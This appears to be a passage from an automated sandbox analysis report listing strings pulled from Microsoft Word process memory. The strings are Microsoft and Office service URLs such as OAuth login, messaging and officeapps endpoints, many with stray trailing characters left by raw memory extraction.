Source: WINWORD.EXE, 00000000.00000000.298963829.000000000D096000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265566787.000000000D096000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&zJ
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)t7
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8z(
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:t&
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;u%
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA$
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB%
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOt
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePt
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQu
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR$
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeficr&
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenu
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep$
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq%
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet_
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeteT
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~t
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/.
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://management.azure.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/t
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.action.office.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.action.office.com/setuseraction16A
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregatorjZ
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://messaging.office.com/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: WINWORD.EXE, 00000000.00000000.299025740.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265671015.000000000D0BF000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ncus.contentsync.
Source: WINWORD.EXE, 00000000.00000000.299221788.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.265756794.000000000D11D000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.289322705.000000000D24F000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.266526921.000000000D24F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/G
Source: WINWORD.EXE, 00000000.00000000.300743360.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: WINWORD.EXE, 00000000.00000000.266497071.000000000D23F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=winword.exe&Version=16.0.4954.1000&ClientI
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord8
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267141726.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com$7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com071
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com:67
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comD6
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comF0
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comJ6
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comL0
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comP6
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comR0
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comV7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comh6
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comj0
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comn7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comp0
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comt7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.comz7
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com~6
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/;m
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: WINWORD.EXE, 00000000.00000000.290169035.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.267363427.000000000DAFD000.00000004.00000001.00020000.00000000.sdmp, 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2687EECC-4F43-442C-AA69-7E12CA414CA2.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
